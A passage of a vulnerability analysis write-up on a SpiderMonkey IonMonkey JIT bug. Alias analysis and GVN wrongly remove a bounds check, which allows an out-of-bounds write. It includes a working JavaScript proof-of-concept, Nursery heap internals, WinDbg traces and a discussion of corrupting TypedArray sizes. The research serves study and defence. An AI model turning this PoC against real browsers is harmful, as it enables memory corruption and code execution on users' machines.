On this diagram I have highlighted the two code regions that we care about. Those two regions are the same, which makes sense as they are the MIR code generated by the two Arr[Idx] = ... statements. The GVN algorithm iterates through the instructions and eventually evaluates the first 19 | boundscheck instruction. Because it has never seen this expression, it records it in case it encounters a similar one in the future; if it does, it might choose to replace one instruction with the other. And so it carries on and eventually hits the other 34 | boundscheck instruction. At this point, it wants to know if 19 and 34 are congruent, and the first step to determine that is to evaluate if those two instructions share the same dependency. In the vulnerable version, as you can see in the alias summary spew, those instructions all have the same dependency on start6, so the check is satisfied. The second step is to invoke MBoundsCheck's implementation of congruentTo, which ensures the two instructions are the same.

  bool congruentTo(const MDefinition* ins) const override {
    if (!ins->isBoundsCheck()) {
      return false;
    }
    const MBoundsCheck* other = ins->toBoundsCheck();
    if (minimum() != other->minimum() || maximum() != other->maximum()) {
      return false;
    }
    if (fallible() != other->fallible()) {
      return false;
    }
    return congruentIfOperandsEqual(other);
  }

Because the algorithm has already run on the previous instructions, it has already replaced instructions 28 to 33 with 12 to 18. Which means, as far as congruentTo is concerned, the two instructions are the same and it is safe for Ion to remove 34 and only have one boundscheck instruction in this function. You can also see this in the GVN spew below, which I edited to show only the relevant parts:

[GVN] Running GVN on graph (with 1 blocks)
[GVN]   Visiting dominator tree (with 1 blocks) rooted at block0 (normal entry block)
[GVN]     Visiting block0
...
[GVN]       Recording Constant12
[GVN]       Recording Slots13
[GVN]       Recording LoadSlot14
[GVN]       Recording Constant15
[GVN]       Folded ToNumberInt3216 to Unbox10
[GVN]       Discarding dead ToNumberInt3216
[GVN]       Recording Elements17
[GVN]       Recording InitializedLength18
[GVN]       Recording BoundsCheck19
[GVN]       Recording SpectreMaskIndex20

…

[GVN]       Replacing Constant28 with Constant12
[GVN]       Discarding dead Constant28

[GVN]       Replacing Slots29 with Slots13
[GVN]       Discarding dead Slots29

[GVN]       Replacing LoadSlot30 with LoadSlot14
[GVN]       Discarding dead LoadSlot30

[GVN]       Folded ToNumberInt3231 to Unbox10
[GVN]       Discarding dead ToNumberInt3231

[GVN]       Replacing Elements32 with Elements17
[GVN]       Discarding dead Elements32

[GVN]       Replacing InitializedLength33 with InitializedLength18
[GVN]       Discarding dead InitializedLength33

[GVN]       Replacing BoundsCheck34 with BoundsCheck19
[GVN]       Discarding dead BoundsCheck34

[GVN]       Replacing SpectreMaskIndex35 with SpectreMaskIndex20
[GVN]       Discarding dead SpectreMaskIndex35

Wow, we did it: we followed the redundancy elimination all the way from the alias analysis through GVN.

Now if we have a look at the alias summary spew for a fixed version of Ion this is what we see:

Patched:
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  slots13 marked depending on start6
[AliasSummaries]  loadslot14 marked depending on start6
[AliasSummaries]  elements17 marked depending on start6
[AliasSummaries]  initializedlength18 marked depending on start6
[AliasSummaries]  elements25 marked depending on start6
[AliasSummaries]  arraylength26 marked depending on start6
[AliasSummaries]  slots29 marked depending on arrayslice27
[AliasSummaries]  loadslot30 marked depending on arrayslice27
[AliasSummaries]  elements32 marked depending on arrayslice27
[AliasSummaries]  initializedlength33 marked depending on arrayslice27

In this case, the two regions of code have different dependencies; the first block depends on start6 as above, but the second now depends on arrayslice27. This makes the instructions non-congruent, which is the very thing that prevents GVN from replacing the second region with the first one :).

Reaching state of no unknowns

Now that we finally understand what is going on, let's keep pushing until we reach what I call the state of no unknowns. What I mean by that is simply to be able to explain every little detail of the PoC and be in full control of it.

And at the end of the day, there is no magic. It's just code and the truth is out there :).

At this point, this is the PoC I am trying to demystify a bit more (if you want to follow along at home):

let Trigger = false;
let Arr = null;

function Target(Special, Idx, Value) {
    Arr[Idx] = 0x41414141;
    Special.slice();
    Arr[Idx] = Value;
}

class SoSpecial extends Array {
    static get [Symbol.species]() {
        return function() {
            if(!Trigger) {
                return;
            }

            Arr.length = 0;
            gc();
        };
    }
};

function main() {
    const Snowflake = new SoSpecial();
    Arr = new Array(0x7e);
    for(let Idx = 0; Idx < 0x400; Idx++) {
        Target(Snowflake, 0x30, Idx);
    }

    Trigger = true;
    Target(Snowflake, 0x20, 0xBB);
}

main();

In the following sections we walk through various aspects of the PoC, SpiderMonkey and IonMonkey internals in order to gain an even better understanding of all the behaviors at play here. It might be only < 100 lines of code but a lot of things happen :).

Phew, you made it here! I guess this is a good point for people who were only interested in the root cause of this issue to stop reading: we have shed enough light on the vulnerability and its roots. For the people who want more though, and who still have a lot of questions like 'why is this working and this is not', 'why is it not crashing reliably' or 'why does this line matter', fasten your seat belt and let's go!

The Nursery

The first stop is to explain in more detail how one of the three heap allocators in SpiderMonkey works: the Nursery.

The Nursery is actually, for once, a very simple allocator. It is useful and important to know how it is designed, as that gives you natural answers to what it is able to do and what it cannot do (by design).

The Nursery is specific to a JSRuntime and by default has a maximum size of 16MB (you can tweak the size with --nursery-size with the JavaScript shell js.exe). The memory is allocated by VirtualAlloc (by chunks of 0x100000 bytes PAGE_READWRITE memory) in js::gc::MapAlignedPages and here is an example call-stack:

 # Call Site
00 KERNELBASE!VirtualAlloc
01 js!js::gc::MapAlignedPages
02 js!js::gc::GCRuntime::getOrAllocChunk
03 js!js::Nursery::init
04 js!js::gc::GCRuntime::init
05 js!JSRuntime::init
06 js!js::NewContext
07 js!main

This contiguous region of memory is called a js::NurseryChunk and the allocator places such a structure there. The js::NurseryChunk starts with the actual usable space for allocations and has a trailer metadata at the end:

const size_t ChunkShift = 20;
const size_t ChunkSize = size_t(1) << ChunkShift;

const size_t ChunkTrailerSize = 2 * sizeof(uintptr_t) + sizeof(uint64_t);

static const size_t NurseryChunkUsableSize =
      gc::ChunkSize - gc::ChunkTrailerSize;

struct NurseryChunk {
  char data[Nursery::NurseryChunkUsableSize];
  gc::ChunkTrailer trailer;

  static NurseryChunk* fromChunk(gc::Chunk* chunk);
  void poisonAndInit(JSRuntime* rt, size_t extent = ChunkSize);
  void poisonAfterSweep(size_t extent = ChunkSize);
  uintptr_t start() const { return uintptr_t(&data); }
  uintptr_t end() const { return uintptr_t(&trailer); }
  gc::Chunk* toChunk(JSRuntime* rt);
};

Every js::NurseryChunk is 0x100000 bytes long (on x64), or 256 pages total, and has effectively 0xfffe8 usable bytes (the rest is metadata). The allocator purposely tries to fragment those regions in the virtual address space of the process (on x64), so there is no specific offset between the chunks.

The way allocations are organized in this region is pretty easy: say the user asks for a 0x30-byte allocation, the allocator returns its current position to back the allocation and simply bumps its current location by +0x30. The biggest allocation request that can go through the Nursery is 1024 bytes (defined by js::Nursery::MaxNurseryBufferSize); if a request exceeds this size, the allocation is usually serviced from the jemalloc heap (which is the third heap in Firefox: Nursery, Tenured and jemalloc).
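Here is a minimal bump allocator modeling that behavior (a sketch; ToyNursery is made up, only the two constants mirror the ones mentioned above):

#include <cstdint>
#include <cstdlib>

struct ToyNursery {
  static const size_t kUsableSize = 0xfffe8;  // NurseryChunkUsableSize
  static const size_t kMaxBuffer = 1024;      // MaxNurseryBufferSize
  uint8_t* chunk;
  size_t position = 0;

  ToyNursery() : chunk(static_cast<uint8_t*>(malloc(kUsableSize))) {}

  void* allocate(size_t bytes) {
    if (bytes > kMaxBuffer) return nullptr;  // handed off to jemalloc instead
    if (position + bytes > kUsableSize) return nullptr;  // chunk full: new
                                                         // chunk or minor GC
    void* p = chunk + position;
    position += bytes;  // just bump the cursor; no free list, no per-object metadata
    return p;
  }
};

int main() {
  ToyNursery nursery;
  void* a = nursery.allocate(0x30);  // two consecutive 0x30-byte requests...
  void* b = nursery.allocate(0x30);  // ...come back adjacent in memory
  return (static_cast<uint8_t*>(b) - static_cast<uint8_t*>(a)) == 0x30 ? 0 : 1;
}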

When a chunk is full and the Nursery hasn't reached its maximum size yet, it sets up a new js::NurseryChunk (as in the above call-stack) and swaps the current one for the new one. If the Nursery has reached its maximum capacity, it triggers a minor garbage collection which collects the objects that need collection (the ones that have no references anymore) and moves all the objects still alive onto the Tenured heap. This gives the Nursery a clean slate.

Even though the Nursery doesn't keep track of the various objects it has allocated, because they are all allocated contiguously the runtime is basically able to iterate over the objects one by one: it works out the boundary of the current object and moves on to the next. Pretty cool.

While writing up this section I also added a new utility command in sm.js called !in_nursery <addr> that tells you if addr belongs to the Nursery or not. On top of that, it shows you interesting information about its internal state. This is what it looks like:

0:008> !in_nursery 0x19767e00df8
Using previously cached JSContext @0x000001fe17318000
0x000001fe1731cde8: js::Nursery
 ChunkCountLimit: 0x0000000000000010 (16 MB)
        Capacity: 0x0000000000fffe80 bytes
    CurrentChunk: 0x0000019767e00000
        Position: 0x0000019767e00eb0
          Chunks:
            00: [0x0000019767e00000 - 0x0000019767efffff]
            01: [0x00001fa2aee00000 - 0x00001fa2aeefffff]
            02: [0x0000115905000000 - 0x00001159050fffff]
            03: [0x00002fc505200000 - 0x00002fc5052fffff]
            04: [0x000020d078700000 - 0x000020d0787fffff]
            05: [0x0000238217200000 - 0x00002382172fffff]
            06: [0x00003ff041f00000 - 0x00003ff041ffffff]
            07: [0x00001a5458700000 - 0x00001a54587fffff]
-------
0x19767e00df8 has been found in the js::NurseryChunk @0x19767e00000!

Understanding what happens to Arr

The first thing that was bothering me is the very specific number of items the array is instantiated with:

Arr = new Array(0x7e);

People following at home will also notice that modifying this constant takes us from a PoC that crashes reliably to... a PoC that may not even crash anymore.

Let's start at the beginning and gather information. This is an array that gets allocated in the Nursery (also called DefaultHeap) with the OBJECT2_BACKGROUND kind which means it is 0x30 bytes long - basically just enough to pack a js::NativeObject (0x20 bytes) as well as a js::ObjectElements (0x10 bytes):

0:000> ?? sizeof(js!js::NativeObject) + sizeof(js!js::ObjectElements)
unsigned int64 0x30

0:000> r
js!js::AllocateObject<js::CanGC>:
00007ff7`87ada9b0 4157            push    r15

0:000> ?? kind
js::gc::AllocKind OBJECT2_BACKGROUND (0n5)

0:000> x js!js::gc::Arena::ThingSizes
00007ff7`88133fe0 js!js::gc::Arena::ThingSizes = <no type information>

0:000> dds 00007ff7`88133fe0 + (5 * 4) l1
00007ff7`88133ff4  00000030

0:000> kc
 # Call Site
00 js!js::AllocateObject<js::CanGC>
01 js!js::ArrayObject::createArray
02 js!NewArrayTryUseGroup<2046>
03 js!ArrayConstructorImpl
04 js!js::ArrayConstructor
05 js!InternalConstruct
06 js!Interpret
07 js!js::RunScript
08 js!js::ExecuteKernel
09 js!js::Execute
0a js!JS_ExecuteScript
0b js!Process
0c js!main
0d js!__scrt_common_main_seh
0e KERNEL32!BaseThreadInitThunk
0f ntdll!RtlUserThreadStart
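To keep the offsets straight, here is a rough sketch of that 0x30-byte layout (field names are simplified assumptions; only the sizes are meant to match the dump):

#include <cstdint>

// The elements header that lives right before the array's values.
struct ObjectElementsSketch {
  uint32_t flags;
  uint32_t initializedLength;
  uint32_t capacity;
  uint32_t length;
};  // 0x10 bytes

struct NativeObjectSketch {
  void* group;         // js::ObjectGroup*
  void* shape;         // js::Shape*
  void* slots;         // js::HeapSlot* for named slots (null here)
  uint64_t* elements;  // js::HeapSlot*; the ObjectElements header sits
                       // immediately *before* the address it points to
};  // 0x20 bytes

static_assert(sizeof(NativeObjectSketch) == 0x20, "matches the dump");
static_assert(sizeof(ObjectElementsSketch) == 0x10, "matches the dump");
int main() {}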

You might be wondering where the space for the 0x7e elements is, though? Well, once the shell of the object is constructed, it grows the elements_ space to be able to store that many elements. The number of elements is adjusted in js::NativeObject::goodElementsAllocationAmount to 0x80, and then js::NativeObject::growElements calls into the Nursery allocator to allocate 0x80 * sizeof(JS::Value) = 0x400 bytes (which is coincidentally the biggest allocation the Nursery can service, as we've seen in the previous section):

0:000> 
js!js::NativeObject::goodElementsAllocationAmount+0x264:
00007ff6`e5dbfae4 418909          mov     dword ptr [r9],ecx ds:00000028`cc9fe9ac=00000000

0:000> r @ecx
ecx=80

0:000> kc
 # Call Site
00 js!js::NativeObject::goodElementsAllocationAmount
01 js!js::NativeObject::growElements
02 js!NewArrayTryUseGroup<2046>
03 js!ArrayConstructorImpl
04 js!js::ArrayConstructor
05 js!InternalConstruct
06 js!Interpret
07 js!js::RunScript
08 js!js::ExecuteKernel
09 js!js::Execute
0a js!JS_ExecuteScript
0b js!Process
0c js!main

...

0:000> t
js!js::Nursery::allocateBuffer:
00007ff6`e6029c70 4156            push    r14

0:000> r @r8
r8=0000000000000400

0:000> kc
 # Call Site
00 js!js::Nursery::allocateBuffer
01 js!js::NativeObject::growElements
02 js!NewArrayTryUseGroup<2046>
03 js!ArrayConstructorImpl
04 js!js::ArrayConstructor
05 js!InternalConstruct
06 js!Interpret
07 js!js::RunScript
08 js!js::ExecuteKernel
09 js!js::Execute
0a js!JS_ExecuteScript
0b js!Process
0c js!main
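Where do the 0x80 slots / 0x400 bytes come from? Here is a rough model of the sizing logic (a sketch; the real js::NativeObject::goodElementsAllocationAmount handles many more cases):

#include <cstdint>
#include <cstdio>

uint32_t goodAllocationAmount(uint32_t reqElements) {
  uint32_t amount = reqElements + 2;  // + ObjectElements::VALUES_PER_HEADER
  uint32_t pow2 = 1;
  while (pow2 < amount) pow2 <<= 1;   // round up to the next power of two
  return pow2;
}

int main() {
  uint32_t slots = goodAllocationAmount(0x7e);
  // 0x7e requested elements + 2 header slots -> 0x80 slots -> 0x400 bytes
  printf("%#x slots -> %#zx bytes\n", slots, size_t(slots) * 8);
}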

Once the allocation is done, it copies the old elements_ content into the new one, updates the Array object and we are done with our Array:

0:000> dt js::NativeObject @r14 elements_
   +0x018 elements_        : 0x000000c9`ffb000f0 js::HeapSlot

0:000> dqs @r14
000000c9`ffb000b0  00002bf2`fa07deb0
000000c9`ffb000b8  00002bf2`fa0987e8
000000c9`ffb000c0  00000000`00000000
000000c9`ffb000c8  000000c9`ffb000f0
000000c9`ffb000d0  00000000`00000000 <- Lost / unused space
000000c9`ffb000d8  0000007e`00000000 <- Lost / unused space
000000c9`ffb000e0  00000000`00000000
000000c9`ffb000e8  0000007e`0000007e

000000c9`ffb000f0  2f2f2f2f`2f2f2f2f
000000c9`ffb000f8  2f2f2f2f`2f2f2f2f
000000c9`ffb00100  2f2f2f2f`2f2f2f2f
000000c9`ffb00108  2f2f2f2f`2f2f2f2f
000000c9`ffb00110  2f2f2f2f`2f2f2f2f
000000c9`ffb00118  2f2f2f2f`2f2f2f2f
000000c9`ffb00120  2f2f2f2f`2f2f2f2f
000000c9`ffb00128  2f2f2f2f`2f2f2f2f

One small remark: because we first allocated 0x30 bytes, we originally had the js::ObjectElements at 000000c9ffb000d0. Because we needed a bigger space, we allocated space for 0x7e elements plus two more JS::Value (in size) to be able to store the new js::ObjectElements (this object is always right before the content of the array). The result is that the old js::ObjectElements at 000000c9ffb000d0/d8 is now unused / lost space; which is kinda fun I suppose :).

[figure: Array allocation in the Nursery]

This is also very similar to what happens when we trigger the Arr.length = 0 statement: the Nursery allocator is invoked to replace the to-be-shrunk elements_ array. This is implemented in js::NativeObject::shrinkElements. This time 8 (which is the minimum, defined as js::NativeObject::SLOT_CAPACITY_MIN) is returned by js::NativeObject::goodElementsAllocationAmount, which results in an allocation request of 8*8=0x40 bytes from the Nursery. js::Nursery::reallocateBuffer decides that this is a no-op because the new size (0x40) is smaller than the old one (0x400) and because the chunk is backed by a Nursery buffer:

void* js::Nursery::reallocateBuffer(JSObject* obj, void* oldBuffer,
                                    size_t oldBytes, size_t newBytes) {
  // ...
  /* The nursery cannot make use of the returned slots data. */
  if (newBytes < oldBytes) {
    return oldBuffer;
  }
  // ...
}

And as a result, our array basically stays the same; only the js::ObjectElement part is updated:

0:000> !smdump_jsobject 0x00000c9ffb000b0
c9ffb000b0: js!js::ArrayObject:            Length: 0 <- Updated length
c9ffb000b0: js!js::ArrayObject:          Capacity: 6 <- This is js::NativeObject::SLOT_CAPACITY_MIN - js::ObjectElements::VALUES_PER_HEADER
c9ffb000b0: js!js::ArrayObject: InitializedLength: 0
c9ffb000b0: js!js::ArrayObject:           Content: []
@$smdump_jsobject(0x00000c9ffb000b0)

0:000> dt js::NativeObject 0x00000c9ffb000b0 elements_
   +0x018 elements_ : 0x000000c9`ffb000f0 js::HeapSlot

Now if you think about it we are able to store arbitrary values in out-of-bounds memory. We fully control the content, and we somewhat control the offset (up to the size of the initial array). But how can we overwrite actually useful data?

Sure, we can make sure to have our array followed by something interesting. Although, if you think about it, we will shrink the array length back to zero and then trigger the vulnerability. Well, by design the object we placed behind us is not reachable by our index because it was precisely adjacent to the original array. So this is not enough; we need to find a way to have the shrunken array moved into a region where it becomes adjacent to something interesting. In that case we end up with interesting corruptible data within reach of our out-of-bounds write.

A minor GC should do the trick as it walks the Nursery, collects the objects that need collection and moves all the other ones onto the Tenured heap. When this happens, it is fair to guess that we get moved to a memory chunk that can just fit the new object.

Code generation with IonMonkey

Before beginning, one thing that you might have been wondering at this point is where we can actually find the implementation of the code generation for a given LIR instruction (MIR gets lowered to LIR, and then code generation kicks in to emit native code).

For example, how does storeelement get lowered to native code (does the MIR storeelement instruction get translated to the LIR LStoreElement instruction)? This will be useful for us to know a bit more about the out-of-bounds memory access we can trigger.

You can find those details in what is called the CodeGenerator, which lives in src/jit/CodeGenerator.cpp. For example, you can quickly see that most of the work for the arrayslice instruction is done by a call into js::ArraySliceDense:

void CodeGenerator::visitArraySlice(LArraySlice* lir) {
  Register object = ToRegister(lir->object());
  Register begin = ToRegister(lir->begin());
  Register end = ToRegister(lir->end());
  Register temp1 = ToRegister(lir->temp1());
  Register temp2 = ToRegister(lir->temp2());

  Label call, fail;

  // Try to allocate an object.
  TemplateObject templateObject(lir->mir()->templateObj());
  masm.createGCObject(temp1, temp2, templateObject, lir->mir()->initialHeap(),
                      &fail);

  // Fixup the group of the result in case it doesn't match the template object.
  masm.copyObjGroupNoPreBarrier(object, temp1, temp2);

  masm.jump(&call);
  {
    masm.bind(&fail);
    masm.movePtr(ImmPtr(nullptr), temp1);
  }
  masm.bind(&call);

  pushArg(temp1);
  pushArg(end);
  pushArg(begin);
  pushArg(object);

  using Fn =
      JSObject* (*)(JSContext*, HandleObject, int32_t, int32_t, HandleObject);
  callVM<Fn, ArraySliceDense>(lir);
}

Most of the MIR instructions translate one-to-one to a LIR instruction (MIR instructions start with an M like MStoreElement, and LIR instructions start with an L like LStoreElement); there are about 309 different MIR instructions (see objdir/js/src/jit/MOpcodes.h) and 434 LIR instructions (see objdir/js/src/jit/LOpcodes.h).

The jit::CodeGenerator::visitArraySlice function is directly invoked from js::jit::CodeGenerator::generateBody in a switch statement dispatching every LIR instruction to its associated handler (note that I have cleaned up the function below by removing a bunch of ifdef blocks useless for our investigation):

bool CodeGenerator::generateBody() {
  JitSpew(JitSpew_Codegen, "==== BEGIN CodeGenerator::generateBody ====\n");
  IonScriptCounts* counts = maybeCreateScriptCounts();

  for (size_t i = 0; i < graph.numBlocks(); i++) {
    current = graph.getBlock(i);

    // Don't emit any code for trivial blocks, containing just a goto. Such
    // blocks are created to split critical edges, and if we didn't end up
    // putting any instructions in them, we can skip them.
    if (current->isTrivial()) {
      continue;
    }

    masm.bind(current->label());

    mozilla::Maybe<ScriptCountBlockState> blockCounts;
    if (counts) {
      blockCounts.emplace(&counts->block(i), &masm);
      if (!blockCounts->init()) {
        return false;
      }
    }
    TrackedOptimizations* last = nullptr;

    for (LInstructionIterator iter = current->begin(); iter != current->end();
         iter++) {
      if (!alloc().ensureBallast()) {
        return false;
      }

      if (counts) {
        blockCounts->visitInstruction(*iter);
      }

      if (iter->mirRaw()) {
        // Only add instructions that have a tracked inline script tree.
        if (iter->mirRaw()->trackedTree()) {
          if (!addNativeToBytecodeEntry(iter->mirRaw()->trackedSite())) {
            return false;
          }
        }

        // Track the start native offset of optimizations.
        if (iter->mirRaw()->trackedOptimizations()) {
          if (last != iter->mirRaw()->trackedOptimizations()) {
            DumpTrackedSite(iter->mirRaw()->trackedSite());
            DumpTrackedOptimizations(iter->mirRaw()->trackedOptimizations());
            last = iter->mirRaw()->trackedOptimizations();
          }
          if (!addTrackedOptimizationsEntry(
                  iter->mirRaw()->trackedOptimizations())) {
            return false;
          }
        }
      }

      setElement(*iter);  // needed to encode correct snapshot location.

      switch (iter->op()) {
#ifndef JS_CODEGEN_NONE
#  define LIROP(op)              \
    case LNode::Opcode::op:      \
      visit##op(iter->to##op()); \
      break;
        LIR_OPCODE_LIST(LIROP)
#  undef LIROP
#endif
        case LNode::Opcode::Invalid:
        default:
          MOZ_CRASH("Invalid LIR op");
      }

      // Track the end native offset of optimizations.
      if (iter->mirRaw() && iter->mirRaw()->trackedOptimizations()) {
        extendTrackedOptimizationsEntry(iter->mirRaw()->trackedOptimizations());
      }
    }
    if (masm.oom()) {
      return false;
    }
  }

  JitSpew(JitSpew_Codegen, "==== END CodeGenerator::generateBody ====\n");
  return true;
}

After theory, let's practice a bit and try to apply all of this learning against the PoC file.

Here is what I would like us to do: let's try to break into the assembly code generated by Ion for the function Target. Then, let's find the boundscheck so that we can trace forward and witness every step of the bug:

  1. Check Idx against the initializedLength of the array
  2. Storing the integer 0x41414141 inside the array's elements_ memory space
  3. Calling slice on Special and making sure the size of Arr has been shrunk and that it is now 0
  4. Finally, witnessing the out-of-bounds store

Before diving in, here is the code that generates the assembly code for the boundscheck instruction:

void CodeGenerator::visitBoundsCheck(LBoundsCheck* lir) {
  const LAllocation* index = lir->index();
  const LAllocation* length = lir->length();
  LSnapshot* snapshot = lir->snapshot();

  if (index->isConstant()) {
    // Use uint32 so that the comparison is unsigned.
    uint32_t idx = ToInt32(index);
    if (length->isConstant()) {
      uint32_t len = ToInt32(lir->length());
      if (idx < len) {
        return;
      }
      bailout(snapshot);
      return;
    }

    if (length->isRegister()) {
      bailoutCmp32(Assembler::BelowOrEqual, ToRegister(length), Imm32(idx),
                   snapshot);
    } else {
      bailoutCmp32(Assembler::BelowOrEqual, ToAddress(length), Imm32(idx),
                   snapshot);
    }
    return;
  }

  Register indexReg = ToRegister(index);
  if (length->isConstant()) {
    bailoutCmp32(Assembler::AboveOrEqual, indexReg, Imm32(ToInt32(length)),
                 snapshot);
  } else if (length->isRegister()) {
    bailoutCmp32(Assembler::BelowOrEqual, ToRegister(length), indexReg,
                 snapshot);
  } else {
    bailoutCmp32(Assembler::BelowOrEqual, ToAddress(length), indexReg,
                 snapshot);
  }
}

According to the code above, we can expect a cmp instruction emitted with two registers, the index and the length, as well as a conditional branch for bailing out if the index is greater than or equal to the length. In our case, one thing to keep in mind is that the length is the initializedLength of the array and not its actual length, as you can see in the MIR code:

18 | initializedlength elements17:Elements
19 | boundscheck unbox10:Int32 initializedlength18:Int32
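In C terms, the emitted check boils down to something like this (a sketch; note the unsigned comparison, which also catches negative indices):

#include <cstdint>

// boundscheck as a C function: the uint32_t casts make the cmp unsigned, so
// a negative index also fails the check and triggers a bailout.
bool boundsCheckOk(int32_t index, int32_t initializedLength) {
  return uint32_t(index) < uint32_t(initializedLength);
}

int main() {
  return boundsCheckOk(0x30, 0x31) ? 0 : 1;  // 0x30 < 0x31: no bailout
}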

Now let's get back to observing the PoC in action. One easy way I found to break in an Ion-generated function right before it emits the native code for a specific LIR instruction is to set a breakpoint in the code generator on the instruction of your choice (or on js::jit::CodeGenerator::generateBody if you want to break at the entry point of the function) and then modify its internal buffer to insert an int3 into the generated code.

This is another command that I added to sm.js called !ion_insertbp.

Check Idx against the initializedLength of the array

In our case, we are interested to break right before the boundscheck so let's set a breakpoint on js!js::jit::CodeGenerator::visitBoundsCheck, invoke !ion_insertbp and then we should be off to the races:

0:008> g
Breakpoint 0 hit
js!js::jit::CodeGenerator::visitBoundsCheck:
00007ff6`e62de1a0 4156            push    r14

0:000> !ion_insertbp
unsigned char 0xcc ''
unsigned int64 0xff
@$ion_insertbp()

0:000> g
(224c.2914): Break instruction exception - code 80000003 (first chance)
0000035c`97b8b299 cc              int     3

0:000> u . l2
0000035c`97b8b299 cc              int     3
0000035c`97b8b29a 3bd9            cmp     ebx,ecx

0:000> t
0000035c`97b8b29a 3bd9            cmp     ebx,ecx

0:000> r.
ebx=00000000`00000031  ecx=00000000`00000030  

Sweet; this cmp is basically the boundscheck instruction comparing the initializedLength of the array (0x31, because we initialized Arr[0x30] a bunch of times when warming up the JIT) to Idx, which is 0x30. The index is in bounds, so the code doesn't bail out and keeps going.

Storing the integer 0x41414141 inside the array's elements_ memory space

If we trace a little further we can see the code generated that loads the integer 0x41414141 into the array at the index 0x30:

0:000> 
0000035c`97b8b2ad 49bb414141410080f8ff mov r11,0FFF8800041414141h

0:000> 
0000035c`97b8b2b7 4c891cea        mov     qword ptr [rdx+rbp*8],r11 ds:000031ea`c7502348=fff88000000003e6

0:000> r @rdx,@rbp
rdx=000031eac75021c8 rbp=0000000000000030

And then the invocation of slice:

0:000>
0000035c`97b8b34b e83060ffff      call    0000035c`97b81380

0:000> t
00000289`d04b1380 48b9008021d658010000 mov rcx,158D6218000h

0:000> u . l20
...
0000035c`97b813c6 e815600000      call    0000035c`97b873e0

0:000> u 0000035c`97b873e0 l1
0000035c`97b873e0 ff2502000000    jmp     qword ptr [0000035c`97b873e8]

0:000> dqs 0000035c`97b873e8 l1
0000035c`97b873e8  00007ff6`e5c642a0 js!js::ArraySliceDense [c:\work\codes\mozilla-central\js\src\builtin\Array.cpp @ 3637]

Calling slice on Special

Then, we make sure we triggered the side effect and shrunk Arr right after the slicing operation (note that I added code to the PoC to print the address of Arr before and after the gc call, otherwise we would have no way of getting its address). To witness that, we have to do some more work to break on the right iteration (the one where Trigger is set to true), as otherwise the function doesn't shrink Arr; all the earlier iterations exist only to warm the JIT up enough for the function to get JIT'ed.

An easy way to break at the right iteration is by looking for something unique about it, like the fact that we use a different index: 0x20 instead of 0x30. For example, we can easily detect that with a breakpoint as below (on the cmp instruction for the boundscheck instruction):

0:000> bp 0000035c`97b8b29a ".if(@ecx == 0x20){}.else{gc}"

0:000> eb 0000035c`97b8b299 90

0:000> g
0000035c`97b8b29a 3bd9            cmp     ebx,ecx

0:000> r.
ebx=00000000`00000031  ecx=00000000`00000020  

Now we can head straight-up to js::ArraySliceDense:

0:000> g js!js::ArraySliceDense+0x40d
js!js::ArraySliceDense+0x40d:
00007ff6`e5c646ad e8eee2ffff      call    js!js::array_slice (00007ff6`e5c629a0)

0:000> ? 000031eac75021c8 - (2*8) - (2*8) - 20
Evaluate expression: 54884436025736 = 000031ea`c7502188

0:000> !smdump_jsobject 0x00031eac7502188
31eac7502188: js!js::ArrayObject:            Length: 126
31eac7502188: js!js::ArrayObject:          Capacity: 126
31eac7502188: js!js::ArrayObject: InitializedLength: 49
31eac7502188: js!js::ArrayObject:           Content: [magic, magic, magic, magic, magic, magic, magic, magic, magic, magic, ...]
@$smdump_jsobject(0x00031eac7502188)

0:000> p
js!js::ArraySliceDense+0x412:
00007ff6`e5c646b2 48337c2450      xor     rdi,qword ptr [rsp+50h] ss:000000bd`675fd270=fffe2d69e5e05100

We grab the address of the array after the gc from stdout, and let's see (the array got moved from 0x00031eac7502188 to 0x0002B0A9D08F160):

0:000> !smdump_jsobject 0x0002B0A9D08F160
2b0a9d08f160: js!js::ArrayObject:            Length: 0
2b0a9d08f160: js!js::ArrayObject:          Capacity: 6
2b0a9d08f160: js!js::ArrayObject: InitializedLength: 0
2b0a9d08f160: js!js::ArrayObject:           Content: []
@$smdump_jsobject(0x0002B0A9D08F160)

Witnessing the out-of-bounds store

And now the last stop is to observe the actual out-of-bounds happening.

0:000> 
0000035c`97b8b35d 8914c8          mov     dword ptr [rax+rcx*8],edx ds:00002b0a`9d08f290=4f4f4f4f

0:000> r.
rcx=00000000`00000020  rax=00002b0a`9d08f190  edx=00000000`000000bb

0:000> t
0000035c`97b8b360 c744c8040080f8ff mov     dword ptr [rax+rcx*8+4],0FFF88000h ds:00002b0a`9d08f294=4f4f4f4f

In the above, @rax is the elements_ pointer, which has a capacity of only 6 js::Values; this means the only valid values for the index (@rcx here) are in [0 - 5]. In summary, we are able to write an integer js::Value, which means we can control the lower 4 bytes but not the upper 4 (those will be FFF88000). Thus, an ideal corruption target for this primitive (which doesn't mean it's the only thing we could do) is the size of an array-like structure stored as a js::Value. It turns out this is exactly how the sizes of TypedArrays are stored - if you don't remember, go have a look at my previous article Introduction to SpiderMonkey exploitation :).
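A quick sketch of why the upper dword is stuck at FFF88000: on x64, SpiderMonkey NaN-boxes an Int32 js::Value by OR-ing the 32-bit payload into a fixed tag, which matches the 0FFF8800041414141h immediate we saw loaded into r11 earlier:

#include <cstdint>
#include <cstdio>

// Box a 32-bit payload as an Int32 js::Value (sketch of the x64 encoding):
// the Int32 tag occupies the top bits, the payload the low 32.
uint64_t boxInt32(uint32_t payload) {
  const uint64_t kInt32Tag = 0xFFF8800000000000ull;
  return kInt32Tag | payload;
}

int main() {
  printf("%016llx\n", (unsigned long long)boxInt32(0x41414141));
  // prints fff8800041414141 -- upper dword fixed, lower dword controlled
}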

In our case, if we look at the neighboring memory we find another array right behind us:

0:000> dqs 0x0002B0A9D08F160 l100
00002b0a`9d08f160  00002b0a`9d07dcd0
00002b0a`9d08f168  00002b0a`9d0987e8
00002b0a`9d08f170  00000000`00000000
00002b0a`9d08f178  00002b0a`9d08f190
00002b0a`9d08f180  00000000`00000000
00002b0a`9d08f188  00000000`00000006
00002b0a`9d08f190  fffa8000`00000000
00002b0a`9d08f198  fffa8000`00000000
00002b0a`9d08f1a0  fffa8000`00000000
00002b0a`9d08f1a8  fffa8000`00000000
00002b0a`9d08f1b0  fffa8000`00000000
00002b0a`9d08f1b8  fffa8000`00000000

00002b0a`9d08f1c0  00002b0a`9d07dc40 <- another array starting here
00002b0a`9d08f1c8  00002b0a`9d098890
00002b0a`9d08f1d0  00000000`00000000
00002b0a`9d08f1d8  00002b0a`9d08f1f0 <- elements_
00002b0a`9d08f1e0  00000000`00000000
00002b0a`9d08f1e8  00000000`00000006
00002b0a`9d08f1f0  2f2f2f2f`2f2f2f2f
